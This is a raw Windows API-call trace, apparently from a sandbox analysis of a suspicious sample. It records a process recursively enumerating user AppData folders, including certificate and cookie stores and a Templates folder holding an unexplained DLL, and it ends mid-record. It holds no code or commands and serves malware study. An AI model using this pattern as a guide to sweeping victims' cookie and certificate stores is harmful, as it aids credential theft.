FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.270] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.270] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.270] GetLastError () returned 0x12 [0220.271] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.271] GetLastError () returned 0x12 [0220.271] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.271] GetLastError () returned 0x12 [0220.271] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x8b126ae0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8b126ae0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0220.271] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.272] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x6c) returned 0x2e6040 [0220.272] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.272] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.272] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x8b126ae0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8b126ae0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.272] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x8b126ae0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8b126ae0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.272] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x869e3840, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x869e3840, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x86a2fb00, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x48e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="niberius.dll", cAlternateFileName="")) returned 1 [0220.273] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x6c) returned 0x2e6040 [0220.273] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2b354e30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b354e30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b4aba90, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4615, dwReserved0=0x0, dwReserved1=0x0, cFileName="Normal.dotm", cAlternateFileName="NORMAL~1.DOT")) returned 1 [0220.273] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x6c) returned 0x2e6040 [0220.273] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x71f9cbc0, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x71f9cbc0, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x71f9cbc0, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0xa2, dwReserved0=0x0, dwReserved1=0x0, cFileName="~$Normal.dotm", cAlternateFileName="~$NORM~1.DOT")) returned 1 [0220.273] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x6c) returned 0x2e6040 [0220.274] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.279] GetLastError () returned 0x12 [0220.279] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8c137f60, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8c1aa380, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c1aa380, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0220.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x66) returned 0x2d60e0 [0220.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.280] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.280] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8c137f60, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8c1aa380, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c1aa380, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.281] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8c137f60, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8c1aa380, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c1aa380, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.281] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c1aa380, ftCreationTime.dwHighDateTime=0x1d772da, ftLastAccessTime.dwLowDateTime=0x8c1aa380, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c1aa380, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUSTOM.DIC", cAlternateFileName="")) returned 1 [0220.281] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x66) returned 0x2d60e0 [0220.281] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.281] GetLastError () returned 0x12 [0220.281] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0220.282] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.282] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x68) returned 0x2d60e0 [0220.282] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.282] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.282] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.283] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.283] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0220.283] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x68) returned 0x2d60e0 [0220.283] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x78) returned 0x2c0b20 [0220.283] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.283] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x88) returned 0x2e6040 [0220.284] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.284] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.284] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xa99dd850, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0220.284] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x78) returned 0x2c0b20 [0220.284] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0220.284] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x78) returned 0x2c0b20 [0220.287] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.287] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7cda41d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7cda41d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7cda41d0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.287] GetLastError () returned 0x12 [0220.287] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.287] GetLastError () returned 0x12 [0220.287] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1 [0220.288] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.288] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0220.288] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.289] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.289] GetLastError () returned 0x12 [0220.289] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.289] GetLastError () returned 0x12 [0220.289] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0220.290] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.290] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5cc8e530, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0220.290] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0220.290] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.290] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7958db70, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.291] GetLastError () returned 0x12 [0220.291] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.291] GetLastError () returned 0x12 [0220.291] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e87ab80, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0220.291] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e87ab80, 